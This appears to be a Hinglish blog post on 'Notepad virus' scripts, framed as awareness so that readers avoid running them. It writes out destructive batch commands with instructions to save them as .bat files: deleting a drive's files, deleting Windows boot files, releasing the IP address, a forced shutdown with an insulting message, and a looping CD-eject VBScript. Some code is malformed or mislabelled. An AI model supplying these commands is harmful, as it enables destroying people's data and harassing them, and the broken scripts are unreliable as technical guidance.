Noteped Virus Script kya hota h aur iss taraha ka virus sa kaisa bacha

Noteped Virus Script kya hota h aur iss taraha ka virus sa kaisa bacha
Dosto aapko to pata hi hoga ki virus mobile ya computer ka liya kitna khatarnak hota h. Virus sa aapka mobile ya computer puri tahara sa kharab v ho sakta h.

Notepad Virus Script

Lakin aapko ya pta nhi hoga ki virus aur kuch nhi bs akk script hoti h jo aapka computer ya mobile ma internet ka jariya ya phir koi file ka jariya aapka system ma aa jata h aur jab aap isa open karta h to, aapka system Hang karna lagta h aur kuch samay ka bd wo kharab v ho jata h ager aapka system ma koi anti-virus na ho to.
To aj hm bt karanga unn script ya codes ka bara ma jissa aap samaj jaya ya script kis taraha ki hoti h, jissa aapko jab v koi aisa script dikha to aap issa run na kara.
Note: Aap iss script ka use galat irada ka liya na kara warna ya bahut hi dangerous v ho sakta h. Aur ager victim complain kara to aap jail v ja sakta h.


Virus created with the help of Computer and Notepad

Dosto jab v koi virus create karta h to uska pass coding ki acchi knowledge hoti h, mager jiska pass coding ki kam knowledge hoti h wo computer per notepad ka jariya virus create kar lata h aur internet ya dusra option ka istamal ker ka victim ka system ma vaj data h aur uska system kaarab ker data h.
To mai aapko Notepad sa create ki hui kuch Virus ki example ka bara ma iss post ma bataunga jo ki .bat file name sa save ki hui hoti h. Ya savi sirf computer virus h na ki koi mobile virus.
1. Delete C Derive: Iss script ka jariya victim ka C derive Delete ho jati h. To chaliya ab dakh lata h ya script hoti kaisi h.

@Echo off
Del C: *.* |y

Aur ya banana ka liya Notepad ka istamal kiya jata h aur iss code ko likh ker .bat File ma save kaiya hota h. Yaha Code ma C Ki jagha per koi v alphabet ho sakti h.

2. Shutdown Computer: Iss virus ka jariya aapka System apna aap shutdown ho jayaga aur jab v aap apna system ko dubara sa open karanga to wo nhi hoga q ki iss notepad virus ki wajah sa system start karna wali files delete ho jati h.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Ya script v notepad ma banti h aur .bat file ma save ki hui hoti h.

3. Stop internet access: Iss virus ka jariya aap internet ka istamal nhi kar sakta h q ki ya aapka IP address ko block kar data h.

@Echo off
Ipconfig /release

4. Shutdown with message: iss notepad script ka jariya kisi ka system shutdown ho jata h aur shutdown hona sa pahala akk message v show hota h script ko dakha.

@echo off
msg * I hate you
shutdown -c "Error! You are too stupid!" –s

5. Eject CD Rom: Iss virus ka jariya aapka CD Rom apna aap eject ho jayaga. Uski script kuch iss paraker h.

Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Ya v .bat file ma save ki hui hoti h jo ki aapka CD rom ko continues eject karta rahagi. Issa Off karna ka liya "Task Manager" par jaye uske bad process tab and end the wscript.exe file par click karke off kare.
To ya hui kuch Notepad Virus ki example. To jab v kavi aa piss taraha ka script ko dakha to ussa kavi v run na kara. Aur kisi ko parasan karna ka liya aap khud v iss tahara h script ka use na kara.

Agar apko iss post sa related aur v kuch jankari chaiya to please comment kara aur ager ya post acchi lagi ho to issa share jarur kara.

Comment Rule:
1. Aap direct comment ma apna link nhi da sakta h lakin ager aap kisi ki help karna ka liya ussa reply ka jariya koi v link provide kar sakta h.
2. Ager aap koi problem ka solution ka liya comment ker rha h to "Notify Me" per jarur click kara.